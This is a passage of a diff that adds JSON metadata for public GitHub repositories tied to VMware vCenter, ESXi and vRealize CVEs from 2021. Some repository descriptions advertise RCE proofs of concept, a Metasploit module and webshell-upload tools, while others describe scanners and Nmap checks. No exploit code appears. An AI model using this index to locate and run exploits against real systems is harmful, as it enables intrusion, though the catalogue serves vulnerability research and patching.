"2021-02-25T13:04:37Z", + "updated_at": "2021-07-14T14:37:02Z", + "pushed_at": "2021-02-25T13:11:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 342706243, + "name": "CVE-2021-21972", + "full_name": "GuayoyoCyber\/CVE-2021-21972", + "owner": { + "login": "GuayoyoCyber", + "id": 17362318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4", + "html_url": "https:\/\/github.com\/GuayoyoCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2021-21972", + "description": "Nmap script to check vulnerability CVE-2021-21972", + "fork": false, + "created_at": "2021-02-26T21:30:50Z", + "updated_at": "2024-08-12T20:10:43Z", + "pushed_at": "2021-03-03T13:54:38Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21972", + "nmap", + "nmap-script" + ], + "visibility": "public", + "forks": 4, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 342822880, + "name": "Detect-CVE-2021-21972", + "full_name": "JMousqueton\/Detect-CVE-2021-21972", + "owner": { + "login": "JMousqueton", + "id": 4148567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4148567?v=4", + "html_url": "https:\/\/github.com\/JMousqueton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JMousqueton\/Detect-CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-02-27T09:53:57Z", + "updated_at": "2021-02-27T10:00:17Z", + "pushed_at": "2021-02-27T10:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 342829114, + "name": "VMware_vCenter_CVE-2021-21972", + "full_name": "robwillisinfo\/VMware_vCenter_CVE-2021-21972", + "owner": { + "login": "robwillisinfo", + "id": 24982882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24982882?v=4", + "html_url": "https:\/\/github.com\/robwillisinfo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robwillisinfo\/VMware_vCenter_CVE-2021-21972", + "description": "VMware vCenter CVE-2021-21972 Tools", + "fork": false, + "created_at": "2021-02-27T10:27:04Z", + "updated_at": "2023-01-05T08:31:41Z", + "pushed_at": "2021-02-27T10:37:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 343440136, + "name": "vcenter_rce", + "full_name": "Ma1Dong\/vcenter_rce", + "owner": { + "login": "Ma1Dong", + "id": 52943794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52943794?v=4", + "html_url": "https:\/\/github.com\/Ma1Dong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ma1Dong\/vcenter_rce", + "description": "漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell", + "fork": false, + "created_at": "2021-03-01T14:14:01Z", + "updated_at": "2024-08-01T10:54:47Z", + "pushed_at": "2021-03-01T14:28:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 343983949, + "name": "cve-2021-21972", + "full_name": "d3sh1n\/cve-2021-21972", + "owner": { + "login": "d3sh1n", + "id": 78736442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78736442?v=4", + "html_url": "https:\/\/github.com\/d3sh1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3sh1n\/cve-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-03-03T03:01:46Z", + "updated_at": "2021-12-27T05:40:13Z", + "pushed_at": "2021-03-11T08:21:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 344383637, + "name": "CVE-2021-21972", + "full_name": "ByZain\/CVE-2021-21972", + "owner": { + "login": "ByZain", + "id": 62633744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62633744?v=4", + "html_url": "https:\/\/github.com\/ByZain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByZain\/CVE-2021-21972", + "description": "CVE-2021-21972 related vulnerability code", + "fork": false, + "created_at": "2021-03-04T07:14:10Z", + "updated_at": "2022-09-13T10:55:17Z", + "pushed_at": "2021-03-04T09:17:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345396191, + "name": "CVE-2021-21972", + "full_name": "TaroballzChen\/CVE-2021-21972", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-21972", + "description": "CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script", + "fork": false, + "created_at": "2021-03-07T16:30:36Z", + "updated_at": "2024-08-12T20:10:59Z", + "pushed_at": "2021-03-07T17:12:55Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 354282443, + "name": "CVE-2021-21972", + "full_name": "ZTK-009\/CVE-2021-21972", + "owner": { + "login": "ZTK-009", + "id": 29515145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29515145?v=4", + "html_url": "https:\/\/github.com\/ZTK-009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZTK-009\/CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-04-03T12:09:53Z", + "updated_at": "2021-04-03T12:10:03Z", + "pushed_at": "2021-04-03T12:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 355150639, + "name": "CVE-2021-21972", + "full_name": "murataydemir\/CVE-2021-21972", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21972", + "description": "[CVE-2021-21972] VMware vSphere Client Unauthorized File Upload to Remote Code Execution (RCE)", + "fork": false, + "created_at": "2021-04-06T10:38:40Z", + "updated_at": "2024-08-27T19:53:59Z", + "pushed_at": "2021-04-06T16:15:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 360539179, + "name": "vSphereyeeter", + "full_name": "pettyhacks\/vSphereyeeter", + "owner": { + "login": "pettyhacks", + "id": 82959253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82959253?v=4", + "html_url": "https:\/\/github.com\/pettyhacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pettyhacks\/vSphereyeeter", + "description": "POC exploit for CVE-2021-21972", + "fork": false, + "created_at": "2021-04-22T14:00:38Z", + "updated_at": "2024-09-18T22:47:22Z", + "pushed_at": "2022-07-21T20:14:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389736878, + "name": "CVE-2021-21972", + "full_name": "haidv35\/CVE-2021-21972", + "owner": { + "login": "haidv35", + "id": 20736458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20736458?v=4", + "html_url": "https:\/\/github.com\/haidv35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haidv35\/CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-07-26T18:48:28Z", + "updated_at": "2023-03-08T02:48:17Z", + "pushed_at": "2021-08-02T17:45:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 405565320, + "name": "CVE-2021-21972", + "full_name": "TAI-REx\/CVE-2021-21972", + "owner": { + "login": "TAI-REx", + "id": 78527947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78527947?v=4", + "html_url": "https:\/\/github.com\/TAI-REx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAI-REx\/CVE-2021-21972", + "description": "CVE-2021-21972 vCenter-6.5-7.0 RCE POC", + "fork": false, + "created_at": "2021-09-12T06:29:02Z", + "updated_at": "2021-09-12T06:29:03Z", + "pushed_at": "2021-02-25T05:28:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 413216838, + "name": "CVE-2021-21972", + "full_name": "orangmuda\/CVE-2021-21972", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-21972", + "description": "CVE-2021-21972 – ᴠᴍᴡᴀʀᴇ ᴄʟɪᴇɴᴛ ᴜɴᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴄᴏᴅᴇ ɪɴᴊᴇᴄᴛɪᴏɴ (ʀᴄᴇ)", + "fork": false, + "created_at": "2021-10-03T23:03:11Z", + "updated_at": "2024-11-08T20:58:12Z", + "pushed_at": "2022-03-07T14:12:38Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21972", + "exploit", + "remote-code-execution", + "vmware" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492815004, + "name": "cve-2021-21972_PoC", + "full_name": "user16-et\/cve-2021-21972_PoC", + "owner": { + "login": "user16-et", + "id": 60484451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60484451?v=4", + "html_url": "https:\/\/github.com\/user16-et", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/user16-et\/cve-2021-21972_PoC", + "description": null, + "fork": false, + "created_at": "2022-05-16T11:57:42Z", + "updated_at": "2022-05-27T06:52:45Z", + "pushed_at": "2022-05-27T06:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 545257457, + "name": "VcenterKiller", + "full_name": "Schira4396\/VcenterKiller", + "owner": { + "login": "Schira4396", + "id": 57404930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4", + "html_url": "https:\/\/github.com\/Schira4396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Schira4396\/VcenterKiller", + "description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接", + "fork": false, + "created_at": "2022-10-04T03:39:27Z", + "updated_at": "2024-11-28T16:39:31Z", + "pushed_at": "2024-04-25T06:09:38Z", + "stargazers_count": 1335, + "watchers_count": 1335, + "has_discussions": false, + "forks_count": 165, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "go", + "golang", + "log4j", + "log4shell", + "scan", + "vcenter" + ], + "visibility": "public", + "forks": 165, + "watchers": 1335, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21973.json b/2021/CVE-2021-21973.json new file mode 100644 index 0000000000..5f6a34f5d3 --- /dev/null +++ b/2021/CVE-2021-21973.json @@ -0,0 +1,33 @@ +[ + { + "id": 348167084, + "name": "CVE-2021-21973-Automateme", + "full_name": "freakanonymous\/CVE-2021-21973-Automateme", + "owner": { + "login": "freakanonymous", + "id": 77834590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77834590?v=4", + "html_url": "https:\/\/github.com\/freakanonymous", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freakanonymous\/CVE-2021-21973-Automateme", + "description": "automate me!", + "fork": false, + "created_at": "2021-03-16T00:50:15Z", + "updated_at": "2024-08-12T20:11:14Z", + "pushed_at": "2021-03-16T00:51:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21974.json b/2021/CVE-2021-21974.json new file mode 100644 index 0000000000..65f079a560 --- /dev/null +++ b/2021/CVE-2021-21974.json @@ -0,0 +1,126 @@ +[ + { + "id": 370771984, + "name": "CVE-2021-21974", + "full_name": "Shadow0ps\/CVE-2021-21974", + "owner": { + "login": "Shadow0ps", + "id": 6516174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4", + "html_url": "https:\/\/github.com\/Shadow0ps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2021-21974", + "description": "POC for CVE-2021-21974 VMWare ESXi RCE Exploit", + "fork": false, + "created_at": "2021-05-25T17:14:38Z", + "updated_at": "2024-11-26T09:38:29Z", + "pushed_at": "2021-07-09T19:38:41Z", + "stargazers_count": 174, + "watchers_count": 174, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 174, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 597541159, + "name": "Feb2023-CVE-2021-21974-OSINT", + "full_name": "n2x4\/Feb2023-CVE-2021-21974-OSINT", + "owner": { + "login": "n2x4", + "id": 31667936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31667936?v=4", + "html_url": "https:\/\/github.com\/n2x4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n2x4\/Feb2023-CVE-2021-21974-OSINT", + "description": "Analysis of the ransom demands from Shodan results", + "fork": false, + "created_at": "2023-02-04T21:23:20Z", + "updated_at": "2023-02-06T01:29:38Z", + "pushed_at": "2023-02-06T03:46:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 599047842, + "name": "ESXi-Ransomware-Scanner-mi", + "full_name": "CYBERTHREATANALYSIS\/ESXi-Ransomware-Scanner-mi", + "owner": { + "login": "CYBERTHREATANALYSIS", + "id": 124778371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124778371?v=4", + "html_url": "https:\/\/github.com\/CYBERTHREATANALYSIS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYBERTHREATANALYSIS\/ESXi-Ransomware-Scanner-mi", + "description": "ESXi EZ - A custom scanner that takes list of IPs either in JSON, CSV or individually and checks for infection CVE-2021-21974", + "fork": false, + "created_at": "2023-02-08T10:46:37Z", + "updated_at": "2023-12-05T21:08:38Z", + "pushed_at": "2023-02-08T11:28:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706986548, + "name": "cve-2021-21974", + "full_name": "hateme021202\/cve-2021-21974", + "owner": { + "login": "hateme021202", + "id": 86812439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86812439?v=4", + "html_url": "https:\/\/github.com\/hateme021202", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hateme021202\/cve-2021-21974", + "description": "Nmap NSE script for cve-2021-21974", + "fork": false, + "created_at": "2023-10-19T02:03:44Z", + "updated_at": "2023-10-19T02:05:10Z", + "pushed_at": "2023-10-19T02:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21975.json b/2021/CVE-2021-21975.json new file mode 100644 index 0000000000..11440e04dd --- /dev/null +++ b/2021/CVE-2021-21975.json @@ -0,0 +1,261 @@ +[ + { + "id": 353356863, + "name": "VMWare-vRealize-SSRF", + "full_name": "Henry4E36\/VMWare-vRealize-SSRF", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/VMWare-vRealize-SSRF", + "description": "VMWare vRealize SSRF-CVE-2021-21975", + "fork": false, + "created_at": "2021-03-31T12:56:09Z", + "updated_at": "2024-08-12T20:11:43Z", + "pushed_at": "2021-04-02T08:53:39Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 14, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 353368245, + "name": "CVE-2021-21975", + "full_name": "dorkerdevil\/CVE-2021-21975", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-21975", + "description": null, + "fork": false, + "created_at": "2021-03-31T13:33:45Z", + "updated_at": "2024-08-12T20:11:43Z", + "pushed_at": "2021-07-04T10:58:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 353407250, + "name": "CVE-2021-21975", + "full_name": "Al1ex\/CVE-2021-21975", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-21975", + "description": "CVE-2021-21975 vRealize Operations Manager SSRF", + "fork": false, + "created_at": "2021-03-31T15:40:09Z", + "updated_at": "2024-08-12T20:11:43Z", + "pushed_at": "2021-03-31T15:50:27Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21975", + "ssrf", + "vrealize-operations-manager" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 353534448, + "name": "exp_hub", + "full_name": "TheTh1nk3r\/exp_hub", + "owner": { + "login": "TheTh1nk3r", + "id": 42456962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42456962?v=4", + "html_url": "https:\/\/github.com\/TheTh1nk3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheTh1nk3r\/exp_hub", + "description": "漏洞复现与poc收集,CVE-2021-21975,cve-2021-22005,CVE-2021-26295,VMware vCenter任意文件读取", + "fork": false, + "created_at": "2021-04-01T01:14:20Z", + "updated_at": "2024-08-12T20:11:44Z", + "pushed_at": "2021-09-30T11:14:58Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 353836398, + "name": "CVE-2021-21975", + "full_name": "GuayoyoCyber\/CVE-2021-21975", + "owner": { + "login": "GuayoyoCyber", + "id": 17362318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4", + "html_url": "https:\/\/github.com\/GuayoyoCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2021-21975", + "description": "Nmap script to check vulnerability CVE-2021-21975", + "fork": false, + "created_at": "2021-04-01T21:59:05Z", + "updated_at": "2024-08-12T20:11:45Z", + "pushed_at": "2021-04-02T00:32:15Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21975", + "nmap", + "nmap-script" + ], + "visibility": "public", + "forks": 8, + "watchers": 28, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 354134708, + "name": "CVE-2021-21975", + "full_name": "murataydemir\/CVE-2021-21975", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21975", + "description": "[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)", + "fork": false, + "created_at": "2021-04-02T21:14:06Z", + "updated_at": "2024-08-12T20:11:47Z", + "pushed_at": "2021-04-02T23:06:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 355355329, + "name": "REALITY_SMASHER", + "full_name": "rabidwh0re\/REALITY_SMASHER", + "owner": { + "login": "rabidwh0re", + "id": 8302932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8302932?v=4", + "html_url": "https:\/\/github.com\/rabidwh0re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabidwh0re\/REALITY_SMASHER", + "description": "vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????)", + "fork": false, + "created_at": "2021-04-06T23:24:38Z", + "updated_at": "2024-11-16T19:48:44Z", + "pushed_at": "2021-04-07T03:10:07Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 38, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 356577164, + "name": "VMWare-CVE-2021-21975", + "full_name": "Vulnmachines\/VMWare-CVE-2021-21975", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/VMWare-CVE-2021-21975", + "description": "VMWare-CVE-2021-21975 SSRF vulnerability", + "fork": false, + "created_at": "2021-04-10T12:36:07Z", + "updated_at": "2024-08-12T20:12:01Z", + "pushed_at": "2021-11-26T20:22:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21978.json b/2021/CVE-2021-21978.json new file mode 100644 index 0000000000..685d4e6736 --- /dev/null +++ b/2021/CVE-2021-21978.json @@ -0,0 +1,95 @@ +[ + { + "id": 344688633, + "name": "CVE-2021-21978", + "full_name": "GreyOrder\/CVE-2021-21978", + "owner": { + "login": "GreyOrder", + "id": 39576135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39576135?v=4", + "html_url": "https:\/\/github.com\/GreyOrder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GreyOrder\/CVE-2021-21978", + "description": "CVE-2021-21978 exp", + "fork": false, + "created_at": "2021-03-05T03:58:33Z", + "updated_at": "2024-10-03T05:15:22Z", + "pushed_at": "2021-03-05T04:22:26Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 344694759, + "name": "CVE-2021-21978", + "full_name": "me1ons\/CVE-2021-21978", + "owner": { + "login": "me1ons", + "id": 36701939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36701939?v=4", + "html_url": "https:\/\/github.com\/me1ons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/me1ons\/CVE-2021-21978", + "description": "CVE-2021-21978 EXP", + "fork": false, + "created_at": "2021-03-05T04:33:19Z", + "updated_at": "2024-08-12T20:10:55Z", + "pushed_at": "2021-03-05T04:42:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 344740961, + "name": "CVE-2021-21978", + "full_name": "skytina\/CVE-2021-21978", + "owner": { + "login": "skytina", + "id": 7366310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7366310?v=4", + "html_url": "https:\/\/github.com\/skytina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skytina\/CVE-2021-21978", + "description": "带回显版本的漏洞利用脚本", + "fork": false, + "created_at": "2021-03-05T08:15:27Z", + "updated_at": "2024-08-12T20:10:55Z", + "pushed_at": "2021-03-05T11:09:06Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21980.json b/2021/CVE-2021-21980.json new file mode 100644 index 0000000000..14b0c12fd0 --- /dev/null +++ b/2021/CVE-2021-21980.json @@ -0,0 +1,64 @@ +[ + { + "id": 434441728, + "name": "westone-CVE-2021-21980-scanner", + "full_name": "Osyanina\/westone-CVE-2021-21980-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-21980-scanner", + "description": "A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.", + "fork": false, + "created_at": "2021-12-03T02:30:14Z", + "updated_at": "2021-12-23T17:30:06Z", + "pushed_at": "2021-12-03T02:57:22Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 